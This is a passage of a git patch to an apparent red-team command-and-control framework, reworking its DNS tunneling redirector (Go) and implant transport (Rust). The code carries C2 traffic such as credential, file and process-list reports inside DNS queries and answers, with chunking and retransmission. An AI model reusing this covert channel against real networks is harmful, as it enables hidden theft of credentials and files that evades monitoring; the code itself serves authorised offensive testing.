0 || chunkSeq >= len(conv.ResponseChunks) { - return nil, fmt.Errorf("invalid chunk sequence: %d (total: %d)", chunkSeq, len(conv.ResponseChunks)) - } + chunkIndex := int(fetchPayload.ChunkIndex) - chunk := conv.ResponseChunks[chunkSeq] - slog.Debug("serving response chunk", "conv_id", convID, "seq", chunkSeq, "size", len(chunk), "is_binary", conv.IsBinaryChunking) + if chunkIndex < 0 || chunkIndex >= len(conv.ResponseChunks) { + return nil, fmt.Errorf("invalid chunk index: %d (total: %d)", chunkIndex, len(conv.ResponseChunks)) + } - // For binary chunking (A/AAAA), return raw bytes - // For text chunking (TXT), return "ok:" prefix + base32 data - if conv.IsBinaryChunking { - return []byte(chunk), nil - } - return []byte(respOK + chunk), nil -} + slog.Debug("returning response chunk", "conv_id", 
conv.ID, "chunk", chunkIndex, + "size", len(conv.ResponseChunks[chunkIndex]), "total_chunks", len(conv.ResponseChunks)) -// reassembleChunks combines chunks in order -func (r *Redirector) reassembleChunks(chunks map[int][]byte, totalChunks int) []byte { - var result []byte - for i := 0; i < totalChunks; i++ { - if chunk, ok := chunks[i]; ok { - slog.Debug("reassembling chunk", "seq", i, "chunk_len", len(chunk), "total_so_far", len(result)) - result = append(result, chunk...) - } else { - // This should never happen since we check for missing chunks first - slog.Error("CRITICAL: Missing chunk during reassembly", "seq", i, "total_chunks", totalChunks, "chunks_present", len(chunks)) + // Clean up if this is the last chunk + if chunkIndex == len(conv.ResponseChunks)-1 { + defer r.conversations.Delete(packet.ConversationId) + slog.Debug("conversation completed", "conv_id", conv.ID) } + + return conv.ResponseChunks[chunkIndex], nil } - slog.Debug("reassembly complete", "final_len", len(result), "total_chunks", totalChunks) - return result + + // Single response (not chunked) + defer r.conversations.Delete(packet.ConversationId) + + slog.Debug("returning response", "conv_id", conv.ID, "size", len(conv.ResponseData)) + + return conv.ResponseData, nil } // forwardToUpstream sends request to gRPC server and returns response func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.ClientConn, methodPath string, requestData []byte) ([]byte, error) { - // Create gRPC stream + // Create gRPC stream with the raw codec md := metadata.New(map[string]string{}) ctx = metadata.NewOutgoingContext(ctx, md) + // Determine if this is a streaming method + isClientStreaming := methodPath == "/c2.C2/ReportFile" + isServerStreaming := methodPath == "/c2.C2/FetchAsset" + stream, err := upstream.NewStream(ctx, &grpc.StreamDesc{ StreamName: methodPath, - ServerStreams: true, - ClientStreams: true, + ServerStreams: isServerStreaming, + ClientStreams: isClientStreaming, }, 
methodPath, grpc.CallContentSubtype("raw")) if err != nil { return nil, fmt.Errorf("failed to create stream: %w", err) } - // Determine request/response streaming types - isClientStreaming := methodPath == "/c2.C2/ReportFile" - isServerStreaming := methodPath == "/c2.C2/FetchAsset" - + // Send request if isClientStreaming { - // For client streaming, parse length-prefixed chunks and send individually + // For client streaming (ReportFile), parse length-prefixed chunks and send individually offset := 0 chunkCount := 0 for offset < len(requestData) { @@ -751,7 +526,7 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien return nil, fmt.Errorf("invalid chunk length: %d bytes at offset %d", msgLen, offset) } - // Send individual chunk + // Send individual chunk (already encrypted) chunk := requestData[offset : offset+int(msgLen)] if err := stream.SendMsg(chunk); err != nil { return nil, fmt.Errorf("failed to send chunk %d: %w", chunkCount, err) @@ -765,7 +540,7 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien } else { // For unary/server-streaming, send the request as-is if err := stream.SendMsg(requestData); err != nil { - return nil, fmt.Errorf("failed to send message: %w", err) + return nil, fmt.Errorf("failed to send request: %w", err) } } @@ -775,61 +550,54 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien // Receive response(s) var responseData []byte - responseCount := 0 - for { - var msg []byte - err := stream.RecvMsg(&msg) - if err != nil { - // Check if EOF (normal end of stream) - if stat, ok := status.FromError(err); ok { - if stat.Code() == codes.OK || stat.Code() == codes.Unavailable { + if isServerStreaming { + // For server streaming (FetchAsset), receive multiple chunks with length prefixes + responseCount := 0 + for { + var msg []byte + err := stream.RecvMsg(&msg) + if err != nil { + // Check for EOF (normal end of stream) + if 
strings.Contains(err.Error(), "EOF") { break } + return nil, fmt.Errorf("failed to receive message: %w", err) } - // For streaming responses, we may receive multiple messages - if err.Error() == "EOF" { - break - } - return nil, fmt.Errorf("failed to receive message: %w", err) - } - // Append message data - if len(msg) > 0 { - if isServerStreaming { - // For server streaming, add 4-byte length prefix before each response chunk + if len(msg) > 0 { + // Add 4-byte length prefix before each response chunk lengthPrefix := make([]byte, 4) binary.BigEndian.PutUint32(lengthPrefix, uint32(len(msg))) responseData = append(responseData, lengthPrefix...) responseData = append(responseData, msg...) - } else { - // For unary, just append the response as-is (no length prefix) - responseData = append(responseData, msg...) + responseCount++ } - responseCount++ + } + slog.Debug("received server streaming responses", "method", methodPath, "count", responseCount) + } else { + // For unary, receive single response + if err := stream.RecvMsg(&responseData); err != nil { + return nil, fmt.Errorf("failed to receive response: %w", err) } } - slog.Debug("received responses", "method", methodPath, "count", responseCount, "total_bytes", len(responseData)) - return responseData, nil } -// parseDomainNameAndType extracts both domain name and query type from DNS question +// parseDomainNameAndType extracts domain name and query type func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) { var labels []string offset := 0 - // Parse domain name for offset < len(data) { length := int(data[offset]) if length == 0 { - offset++ break } offset++ if offset+length > len(data) { - return "", 0, fmt.Errorf("invalid label length") + return "", 0, fmt.Errorf("invalid domain name") } label := string(data[offset : offset+length]) @@ -837,7 +605,9 @@ func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) offset += length } - // Parse query type (2 bytes after 
domain name) + // Skip the null terminator (0x00) + offset++ + if offset+2 > len(data) { return "", 0, fmt.Errorf("query too short for type field") } @@ -848,20 +618,53 @@ func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) return domain, queryType, nil } -// sendDNSResponse sends a DNS response with the appropriate record type -// Returns true if response was sent successfully, false if it failed -func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, data []byte, queryType uint16) bool { +// sendDNSResponse sends a DNS response with appropriate record type (TXT/A/AAAA) +// For A/AAAA records with data larger than 4/16 bytes, multiple answer records are sent +func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16, data []byte) { + // For A/AAAA records, base32-encode data first (client expects to decode it) + if queryType == aRecordType || queryType == aaaaRecordType { + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) + data = []byte(encoded) + } + + // Determine chunk size and number of answer records needed + var recordSize int + var answerCount uint16 + + switch queryType { + case txtRecordType: + // TXT can handle all data in one record (with internal chunking) + recordSize = 0 // Special case - handled separately + answerCount = 1 + case aRecordType: + recordSize = 4 + answerCount = uint16((len(data) + recordSize - 1) / recordSize) + if answerCount == 0 { + answerCount = 1 + } + case aaaaRecordType: + recordSize = 16 + answerCount = uint16((len(data) + recordSize - 1) / recordSize) + if answerCount == 0 { + answerCount = 1 + } + default: + // Unknown type - single empty record + recordSize = 0 + answerCount = 1 + } + response := make([]byte, 0, 512) // DNS Header response = append(response, byte(transactionID>>8), byte(transactionID)) - response = append(response, 
byte(dnsResponseFlags>>8), byte(dnsResponseFlags&0xFF)) // Flags: Response, no error - response = append(response, 0x00, 0x01) // Questions: 1 - response = append(response, 0x00, 0x01) // Answers: 1 - response = append(response, 0x00, 0x00) // Authority RRs: 0 - response = append(response, 0x00, 0x00) // Additional RRs: 0 + response = append(response, byte(dnsResponseFlags>>8), byte(dnsResponseFlags&0xFF)) + response = append(response, 0x00, 0x01) // Questions: 1 + response = append(response, byte(answerCount>>8), byte(answerCount&0xFF)) // Answers: multiple for A/AAAA + response = append(response, 0x00, 0x00) // Authority RRs: 0 + response = append(response, 0x00, 0x00) // Additional RRs: 0 - // Question section (echo the question) + // Question section - echo back the original query type for _, label := range strings.Split(domain, ".") { if len(label) == 0 { continue @@ -869,77 +672,100 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans response = append(response, byte(len(label))) response = append(response, []byte(label)...) 
} - response = append(response, 0x00) // End of domain - response = append(response, 0x00, byte(queryType)) // Type: echo query type - response = append(response, 0x00, byte(dnsClassIN)) // Class: IN - - // Answer section - // Name (pointer to question) - response = append(response, byte(dnsPointerToQuestion>>8), byte(dnsPointerToQuestion&0xFF)) - // Type: echo query type - response = append(response, 0x00, byte(queryType)) - // Class: IN - response = append(response, 0x00, byte(dnsClassIN)) - // TTL: dnsTTLSeconds - response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) - - // Build RDATA based on query type - var rdata []byte + response = append(response, 0x00) // End of domain + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: original query type + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + // Answer section - build multiple records for A/AAAA switch queryType { case txtRecordType: - // TXT record: split data into txtMaxChunkSize-byte chunks - txtData := data - var txtChunks [][]byte - for len(txtData) > 0 { - chunkSize := len(txtData) - if chunkSize > txtMaxChunkSize { - chunkSize = txtMaxChunkSize + // TXT record: single record with length-prefixed strings (split into 255-byte chunks) + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: TXT + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + var rdata []byte + if len(data) == 0 { + rdata = []byte{0x00} // Empty TXT string + } else { + // Split into 255-byte chunks + tempData := data + for len(tempData) > 0 { + chunkSize := len(tempData) + if chunkSize > txtMaxChunkSize { + chunkSize = txtMaxChunkSize + } + rdata = append(rdata, byte(chunkSize)) + rdata = append(rdata, tempData[:chunkSize]...) 
+ tempData = tempData[chunkSize:] } - txtChunks = append(txtChunks, txtData[:chunkSize]) - txtData = txtData[chunkSize:] } - // If no data, add an empty TXT string - if len(txtChunks) == 0 { - txtChunks = append(txtChunks, []byte{}) - } - - // Build TXT RDATA - for _, chunk := range txtChunks { - rdata = append(rdata, byte(len(chunk))) - rdata = append(rdata, chunk...) - } + // RDLENGTH and RDATA + response = append(response, byte(len(rdata)>>8), byte(len(rdata))) + response = append(response, rdata...) case aRecordType: - // Pad to 4 bytes (data already validated to fit) - rdata = make([]byte, 4) - copy(rdata, data) + // Multiple A records - 4 bytes each + for i := uint16(0); i < answerCount; i++ { + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, 0x00, byte(aRecordType)) // Type: A + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + // RDLENGTH: always 4 for A records + response = append(response, 0x00, 0x04) + + // RDATA: 4 bytes from data, padded with zeros if needed + start := int(i) * recordSize + end := start + recordSize + rdata := make([]byte, 4) + if start < len(data) { + copyEnd := end + if copyEnd > len(data) { + copyEnd = len(data) + } + copy(rdata, data[start:copyEnd]) + } + response = append(response, rdata...) 
+ } case aaaaRecordType: - // Pad to 16 bytes (data already validated to fit) - rdata = make([]byte, 16) - copy(rdata, data) + // Multiple AAAA records - 16 bytes each + for i := uint16(0); i < answerCount; i++ { + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, 0x00, byte(aaaaRecordType)) // Type: AAAA + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + // RDLENGTH: always 16 for AAAA records + response = append(response, 0x00, 0x10) + + // RDATA: 16 bytes from data, padded with zeros if needed + start := int(i) * recordSize + end := start + recordSize + rdata := make([]byte, 16) + if start < len(data) { + copyEnd := end + if copyEnd > len(data) { + copyEnd = len(data) + } + copy(rdata, data[start:copyEnd]) + } + response = append(response, rdata...) + } default: - // Unsupported record type, fallback to TXT - slog.Warn("unsupported query type, using TXT", "query_type", queryType) - rdata = []byte{byte(len(data))} - rdata = append(rdata, data...) + // Unknown type - single empty record + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: match query + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + response = append(response, 0x00, 0x00) // RDLENGTH: 0 } - // RDLENGTH - response = append(response, byte(len(rdata)>>8), byte(len(rdata))) - // RDATA - response = append(response, rdata...) 
- - // Send response - _, err := conn.WriteToUDP(response, addr) - if err != nil { - slog.Error("failed to send DNS response", "error", err) - return false - } - return true + conn.WriteToUDP(response, addr) } // sendErrorResponse sends a DNS error response @@ -947,148 +773,7 @@ func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, tra response := make([]byte, dnsHeaderSize) binary.BigEndian.PutUint16(response[0:2], transactionID) response[2] = byte(dnsErrorFlags >> 8) - response[3] = byte(dnsErrorFlags & 0xFF) // RCODE: Name Error + response[3] = byte(dnsErrorFlags & 0xFF) conn.WriteToUDP(response, addr) } - -// sendBenignResponse sends a benign DNS response for resolver queries -func (r *Redirector) sendBenignResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16) { - var data []byte - switch queryType { - case aRecordType: - data = []byte{localhostIPv4Octet1, 0, 0, localhostIPv4Octet4} // 127.0.0.1 - case aaaaRecordType: - data = make([]byte, 16) // ::1 - data[localhostIPv6Byte15] = localhostIPv6Byte15 - default: - data = []byte{} // empty response - } - r.sendDNSResponse(conn, addr, transactionID, domain, data, queryType) -} - -// generateConvID generates a random conversation ID -func generateConvID() string { - const chars = "0123456789abcdefghijklmnopqrstuvwxyz" - b := make([]byte, convIDSize) - for i := range b { - b[i] = chars[rand.Intn(len(chars))] - } - return string(b) -} - -// codeToMethod maps 2-character method code to gRPC path -// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, -// -// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput -func codeToMethod(code string) string { - methods := map[string]string{ - "ct": "/c2.C2/ClaimTasks", - "fa": "/c2.C2/FetchAsset", - "rc": "/c2.C2/ReportCredential", - "rf": "/c2.C2/ReportFile", - "rp": "/c2.C2/ReportProcessList", - "rt": "/c2.C2/ReportTaskOutput", - } - - if path, ok := methods[code]; ok { - return path - } - - 
return "/c2.C2/ClaimTasks" -} - -// encodeBase36 encodes an integer to base36 string with specified number of digits -func encodeBase36(value int, digits int) string { - const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" - result := make([]byte, digits) - for i := digits - 1; i >= 0; i-- { - result[i] = base36[value%base36Radix] - value /= base36Radix - } - return string(result) -} - -// decodeBase36 decodes a base36 string to an integer -func decodeBase36(encoded string) (int, error) { - val := func(c byte) (int, error) { - switch { - case c >= '0' && c <= '9': - return int(c - '0'), nil - case c >= 'a' && c <= 'z': - return int(c-'a') + 10, nil - default: - return 0, fmt.Errorf("invalid base36 character: %c", c) - } - } - - result := 0 - for _, c := range []byte(encoded) { - digit, err := val(c) - if err != nil { - return 0, err - } - result = result*base36Radix + digit - } - return result, nil -} - -// encodeSeq encodes sequence number to 5-digit base36 (max: 60,466,175) -func encodeSeq(seq int) string { - return encodeBase36(seq, 5) -} - -// decodeSeq decodes 5-character base36 sequence number -func decodeSeq(encoded string) (int, error) { - if len(encoded) != 5 { - return 0, fmt.Errorf("invalid sequence length: expected 5, got %d", len(encoded)) - } - return decodeBase36(encoded) -} - -// EncodeBase36CRC encodes CRC16 to 4-digit base36 (range: 0-1,679,615 covers 0-65,535) -func EncodeBase36CRC(crc int) string { - return encodeBase36(crc, 4) -} - -// decodeBase36CRC decodes 4-character base36 CRC value -func decodeBase36CRC(encoded string) (int, error) { - if len(encoded) != 4 { - return 0, fmt.Errorf("invalid CRC length: expected 4, got %d", len(encoded)) - } - return decodeBase36(encoded) -} - -// CalculateCRC16 computes CRC16-CCITT checksum -func CalculateCRC16(data []byte) uint16 { - var crc uint16 = crc16Init - for _, b := range data { - crc ^= uint16(b) << 8 - for i := 0; i < 8; i++ { - if (crc & crc16HighBit) != 0 { - crc = (crc << 1) ^ 
crc16Polynomial - } else { - crc <<= 1 - } - } - } - return crc -} - -// encodeBase32 encodes data to lowercase base32 without padding -func encodeBase32(data []byte) string { - if len(data) == 0 { - return "" - } - encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) - return strings.ToLower(encoded) -} - -// decodeBase32 decodes lowercase base32 data without padding -func decodeBase32(encoded string) ([]byte, error) { - if len(encoded) == 0 { - return []byte{}, nil - } - encoded = strings.ToUpper(encoded) - return base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(encoded) -} From 66cbc55024270f670ff21f5da228a3263f849c00 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Mon, 22 Dec 2025 23:07:48 -0600 Subject: [PATCH 06/17] working, thanks ai! --- implants/lib/pb/src/generated/dns.rs | 35 +- implants/lib/transport/src/dns.rs | 384 ++++++++++++++++---- tavern/internal/c2/dnspb/dns.pb.go | 164 +++++++-- tavern/internal/c2/proto/dns.proto | 16 +- tavern/internal/redirectors/dns/dns.go | 311 ++++++++++++---- tavern/internal/redirectors/dns/dns_test.go | 54 +-- 6 files changed, 720 insertions(+), 244 deletions(-) diff --git a/implants/lib/pb/src/generated/dns.rs b/implants/lib/pb/src/generated/dns.rs index 452de3d5e..67665d669 100644 --- a/implants/lib/pb/src/generated/dns.rs +++ b/implants/lib/pb/src/generated/dns.rs @@ -19,6 +19,28 @@ pub struct DnsPacket { /// Optional CRC32 for validation #[prost(uint32, tag = "5")] pub crc32: u32, + /// Async protocol fields for windowed transmission + /// + /// Number of packets client has in-flight + #[prost(uint32, tag = "6")] + pub window_size: u32, + /// Ranges of successfully received chunks (SACK) + #[prost(message, repeated, tag = "7")] + pub acks: ::prost::alloc::vec::Vec, + /// Specific sequence numbers to retransmit + #[prost(uint32, repeated, tag = "8")] + pub nacks: ::prost::alloc::vec::Vec, +} +/// AckRange represents a contiguous 
range of acknowledged sequence numbers +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct AckRange { + /// Inclusive start of range + #[prost(uint32, tag = "1")] + pub start_seq: u32, + /// Inclusive end of range + #[prost(uint32, tag = "2")] + pub end_seq: u32, } /// InitPayload is the payload for INIT packets /// It contains metadata about the upcoming data transmission @@ -34,6 +56,9 @@ pub struct InitPayload { /// CRC32 checksum of complete request data #[prost(uint32, tag = "3")] pub data_crc32: u32, + /// Total size of the file/data in bytes + #[prost(uint32, tag = "4")] + pub file_size: u32, } /// FetchPayload is the payload for FETCH packets /// It specifies which response chunk to retrieve @@ -67,10 +92,10 @@ pub enum PacketType { Init = 1, /// Send data chunk Data = 2, - /// Finalize request - End = 3, /// Retrieve response chunk - Fetch = 4, + Fetch = 3, + /// Server status response with ACKs/NACKs + Status = 4, } impl PacketType { /// String value of the enum field names used in the ProtoBuf definition. @@ -82,8 +107,8 @@ impl PacketType { PacketType::Unspecified => "PACKET_TYPE_UNSPECIFIED", PacketType::Init => "PACKET_TYPE_INIT", PacketType::Data => "PACKET_TYPE_DATA", - PacketType::End => "PACKET_TYPE_END", PacketType::Fetch => "PACKET_TYPE_FETCH", + PacketType::Status => "PACKET_TYPE_STATUS", } } /// Creates an enum from field names used in the ProtoBuf definition. 
@@ -92,8 +117,8 @@ impl PacketType { "PACKET_TYPE_UNSPECIFIED" => Some(Self::Unspecified), "PACKET_TYPE_INIT" => Some(Self::Init), "PACKET_TYPE_DATA" => Some(Self::Data), - "PACKET_TYPE_END" => Some(Self::End), "PACKET_TYPE_FETCH" => Some(Self::Fetch), + "PACKET_TYPE_STATUS" => Some(Self::Status), _ => None, } } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 3850d19a5..5ccf5061e 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -14,6 +14,11 @@ const MAX_LABEL_LENGTH: usize = 63; const MAX_DNS_NAME_LENGTH: usize = 253; const CONV_ID_LENGTH: usize = 8; +// Async protocol configuration +const SEND_WINDOW_SIZE: usize = 10; // Packets in flight +const MAX_RETRIES_PER_CHUNK: u32 = 3; // Max retries for a chunk +const MAX_DATA_SIZE: usize = 50 * 1024 * 1024; // 50MB max data size + // DNS resolver fallbacks const FALLBACK_DNS_SERVERS: &[&str] = &["1.1.1.1:53", "8.8.8.8:53"]; @@ -83,38 +88,40 @@ impl DNS { } /// Calculate maximum data size that will fit in DNS query - fn calculate_max_chunk_size(&self) -> usize { + fn calculate_max_chunk_size(&self, total_chunks: u32) -> usize { // DNS limit: total_length <= 253 - // Format: . - // total_length = encoded_length + num_dots + base_domain_length - // num_dots = ceil(encoded_length / 63) - 1 + 1 = ceil(encoded_length / 63) + // Format: ...... 
+ // total_length = encoded_length + ceil(encoded_length / 63) + base_domain_length let base_domain_len = self.base_domain.len(); + let available = MAX_DNS_NAME_LENGTH.saturating_sub(base_domain_len); - // Available for encoded data and its dots - let available = MAX_DNS_NAME_LENGTH.saturating_sub(base_domain_len + 1); // +1 for dot before base_domain - - // For every 63 chars of encoded data, we need 1 dot - // So: encoded_length + ceil(encoded_length / 63) <= available - // Rearranging: encoded_length <= available * 63 / 64 - let max_encoded_length = (available * 63) / 64; + // Calculate max encoded length where: encoded + ceil(encoded/63) <= available + // For n complete labels (63 chars each): n*63 + n = n*64 + // So: floor(available / 64) * 63 gives us the safe amount + let complete_labels = available / 64; + let max_encoded_length = complete_labels * 63; - // Base32 encoding: 5 bytes -> 8 chars - // So: encoded_length = ceil(protobuf_length * 8 / 5) - // Rearranging: protobuf_length = floor(encoded_length * 5 / 8) + // Base32: 5 bytes protobuf -> 8 chars encoded + // protobuf_length = encoded_length * 5 / 8 let max_protobuf_length = (max_encoded_length * 5) / 8; - // Protobuf overhead: - // - type: 1 byte tag + 1 byte value = 2 bytes - // - sequence: 1 byte tag + varint (1-5 bytes, assume 3 for safety) = 4 bytes - // - conversation_id: 1 byte tag + 1 byte length + 8 bytes string = 10 bytes - // - data: 1 byte tag + varint length (1-2 bytes for our sizes) = 3 bytes - // - crc32: 1 byte tag + varint (1-5 bytes, assume 3 for safety) = 4 bytes - // Total: 2 + 4 + 10 + 3 + 4 = 23 bytes - const PROTOBUF_FIXED_OVERHEAD: usize = 23; - - // Max data size is exactly what fits - max_protobuf_length.saturating_sub(PROTOBUF_FIXED_OVERHEAD) + // Calculate protobuf overhead with worst-case varint sizes + let sample_packet = DnsPacket { + r#type: PacketType::Data.into(), + sequence: total_chunks, + conversation_id: "a".repeat(CONV_ID_LENGTH), + data: vec![], + crc32: 
0xFFFFFFFF, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], + }; + + let overhead = sample_packet.encoded_len(); + + // Max data size is what fits after overhead + max_protobuf_length.saturating_sub(overhead) } /// Encode data using Base32 (DNS-safe, case-insensitive) @@ -172,7 +179,7 @@ impl DNS { /// Send packet and get response with resolver fallback async fn send_packet(&mut self, packet: DnsPacket) -> Result> { let subdomain = self.build_subdomain(&packet)?; - let query = self.build_dns_query(&subdomain)?; + let (query, txid) = self.build_dns_query(&subdomain)?; // Try each DNS server in order let mut last_error = None; @@ -180,7 +187,7 @@ impl DNS { let server_idx = (self.current_server_index + attempt) % self.dns_servers.len(); let server = &self.dns_servers[server_idx]; - match self.try_dns_query(server, &query).await { + match self.try_dns_query(server, &query, txid).await { Ok(response) => { // Update current server on success self.current_server_index = server_idx; @@ -197,7 +204,7 @@ impl DNS { } /// Try a single DNS query against a specific server - async fn try_dns_query(&self, server: &str, query: &[u8]) -> Result> { + async fn try_dns_query(&self, server: &str, query: &[u8], expected_txid: u16) -> Result> { // Create UDP socket with timeout let socket = UdpSocket::bind("0.0.0.0:0").await?; socket.connect(server).await?; @@ -213,16 +220,17 @@ impl DNS { .map_err(|_| anyhow::anyhow!("DNS query timeout"))??; buf.truncate(len); - // Parse TXT record from response - self.parse_dns_response(&buf) + // Parse and validate response + self.parse_dns_response(&buf, expected_txid) } - /// Build DNS query packet - fn build_dns_query(&self, domain: &str) -> Result> { + /// Build DNS query packet with random transaction ID + fn build_dns_query(&self, domain: &str) -> Result<(Vec, u16)> { let mut query = Vec::new(); - // Transaction ID - query.extend_from_slice(&[0x12, 0x34]); + // Transaction ID (random for security) + let txid = 
rand::random::(); + query.extend_from_slice(&txid.to_be_bytes()); // Flags: standard query query.extend_from_slice(&[0x01, 0x00]); // Questions: 1 @@ -262,15 +270,21 @@ impl DNS { // Class: IN (1) query.extend_from_slice(&[0x00, 0x01]); - Ok(query) + Ok((query, txid)) } - /// Parse DNS response based on record type - fn parse_dns_response(&self, response: &[u8]) -> Result> { + /// Parse DNS response based on record type, validating transaction ID + fn parse_dns_response(&self, response: &[u8], expected_txid: u16) -> Result> { if response.len() < 12 { return Err(anyhow::anyhow!("DNS response too short")); } + // Validate transaction ID + let response_txid = u16::from_be_bytes([response[0], response[1]]); + if response_txid != expected_txid { + return Err(anyhow::anyhow!("DNS transaction ID mismatch: expected {}, got {}", expected_txid, response_txid)); + } + // Read answer count from header let answer_count = u16::from_be_bytes([response[6], response[7]]) as usize; @@ -357,64 +371,299 @@ impl DNS { Self::unmarshal_with_codec::(&response_data) } - /// Send raw request bytes and receive raw response bytes using DNS protocol - /// Used for streaming requests like report_file where data is pre-marshaled + /// Send raw request bytes and receive raw response bytes using DNS protocol with async transmission + /// Uses windowed transmission with ACK/NACK-based retransmission async fn dns_exchange_raw(&mut self, request_data: Vec, method_code: &str) -> Result> { + use std::collections::{HashSet, HashMap}; + + // Validate data size + if request_data.len() > MAX_DATA_SIZE { + return Err(anyhow::anyhow!( + "Request data exceeds maximum size: {} bytes > {} bytes", + request_data.len(), + MAX_DATA_SIZE + )); + } - // Calculate chunk size based on DNS limits and base domain - let chunk_size = self.calculate_max_chunk_size(); + // Calculate exact chunk_size and total_chunks using varint boundary solving + // Protobuf varints encode differently based on value: + // [1, 127] → 1 
byte, [128, 16383] → 2 bytes, [16384, 2097151] → 3 bytes + let (chunk_size, total_chunks) = if request_data.is_empty() { + (self.calculate_max_chunk_size(1), 1) + } else { + let varint_ranges = [ + (1u32, 127u32), + (128u32, 16383u32), + (16384u32, 2097151u32), + ]; + + let mut result = None; + for (min_chunks, max_chunks) in varint_ranges.iter() { + // Calculate overhead assuming worst case (max sequence in this range) + let chunk_size = self.calculate_max_chunk_size(*max_chunks); + let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1); + + // Check if the calculated total_chunks falls within this range + if total_chunks >= *min_chunks as usize && total_chunks <= *max_chunks as usize { + // Found the correct range - this is exact + result = Some((chunk_size, total_chunks)); + break; + } + } + + // Fallback for very large data (shouldn't happen with 50MB limit) + result.unwrap_or_else(|| { + let chunk_size = self.calculate_max_chunk_size(2097151); + let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1); + (chunk_size, total_chunks) + }) + }; + + let data_crc = Self::calculate_crc32(&request_data); + + log::debug!("DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", + request_data.len(), total_chunks, chunk_size, data_crc); // Generate conversation ID let conv_id = Self::generate_conv_id(); - let total_chunks = (request_data.len() + chunk_size - 1) / chunk_size; - let data_crc = Self::calculate_crc32(&request_data); // Send INIT packet let init_payload = InitPayload { method_code: method_code.to_string(), total_chunks: total_chunks as u32, data_crc32: data_crc, + file_size: request_data.len() as u32, }; let mut init_payload_bytes = Vec::new(); init_payload.encode(&mut init_payload_bytes)?; + log::debug!("DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}", + conv_id, method_code, total_chunks, request_data.len(), data_crc); + let init_packet = DnsPacket { 
r#type: PacketType::Init.into(), sequence: 0, conversation_id: conv_id.clone(), data: init_payload_bytes, crc32: 0, + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], }; - self.send_packet(init_packet).await?; + match self.send_packet(init_packet).await { + Ok(_) => { + log::debug!("DNS: INIT sent for conv_id={}", conv_id); + } + Err(e) => { + return Err(anyhow::anyhow!("Failed to send INIT packet to DNS server: {}.", e)); + } + } + + // Async windowed transmission + let mut acknowledged = HashSet::new(); // Fully acknowledged chunks + let mut nack_set = HashSet::new(); + let mut retry_counts: HashMap = HashMap::new(); + + // Prepare chunks + let chunks: Vec> = request_data + .chunks(chunk_size) + .map(|chunk| chunk.to_vec()) + .collect(); + + // Send all chunks and collect ACKs/NACKs + // In async mode, each DATA packet gets immediate STATUS response via DNS request-response + for seq in 1..=total_chunks { + let seq_u32 = seq as u32; + + // Skip if already acknowledged + if acknowledged.contains(&seq_u32) { + continue; + } + + let chunk = &chunks[seq - 1]; - // Send DATA packets - for (seq, chunk) in request_data.chunks(chunk_size).enumerate() { let data_packet = DnsPacket { r#type: PacketType::Data.into(), - sequence: (seq + 1) as u32, + sequence: seq_u32, conversation_id: conv_id.clone(), - data: chunk.to_vec(), + data: chunk.clone(), crc32: Self::calculate_crc32(chunk), + window_size: SEND_WINDOW_SIZE as u32, + acks: vec![], + nacks: vec![], }; - self.send_packet(data_packet).await?; + + // Send DATA packet and get STATUS response + match self.send_packet(data_packet).await { + Ok(response_data) => { + // The response could be: + // 1. A marshaled STATUS packet (protobuf) + // 2. Plain "ok" string (backward compat) + // 3. 
